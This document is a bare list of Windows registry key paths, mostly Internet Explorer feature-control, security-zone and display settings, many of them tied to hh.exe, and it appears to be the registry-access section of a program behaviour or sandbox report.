                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\MediaTypeClass

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_COMPATDATA

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_COMPATDATA

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\hh.exe

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\*

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_INTERNAL_SECURITY_MANAGER

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_INTERNAL_SECURITY_MANAGER

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\No3DBorder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*

                
                HKEY_CLASSES_ROOT\.htm

                
                HKEY_CURRENT_USER\Software\Classes\.htm\Content Type

                
                HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/html

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/html

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FEEDS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\*

                
                HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/html

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2703

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2703

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OLEALIAS_GWND

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_OLEALIAS_GWND

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TOPMOST_GWND

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_TOPMOST_GWND

                
                HKEY_CURRENT_USER

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollDelay

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInterval

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInset

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\Floppy Access

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Adv AddrBar Spoof Detection

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\Adv AddrBar Spoof Detection

                
                HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\about\

                
                HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Handler\about

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about\CLSID

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Zoom

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Zoom

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom\ZoomDisabled

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Zoom

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_NINPUT_LEGACYMODE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_NINPUT_LEGACYMODE

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALIGNED_TIMERS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALIGNED_TIMERS

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VSYNC_WATCHDOG

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_VSYNC_WATCHDOG

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_HIGHFREQ_TIMERS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_HIGHFREQ_TIMERS

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\MinimumSystemTimerResolution

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\MinimumSystemTimerResolution

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\RenderingLoopMaxTime

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\International\Scripts

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Settings

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\TravelLog

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\IEDevTools\Options

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice

                
                HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROCESS_XML_AS_HTML

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROCESS_XML_AS_HTML

                
                HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ProtectedModeOffForAllZones

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_READ_ZONE_STRINGS_FROM_REGISTRY

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\MinLevel

                
                HKEY_CURRENT_USER\Software\Classes\AppID\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\RecommendedLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\MinLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\RecommendedLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\MinLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\RecommendedLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon

                
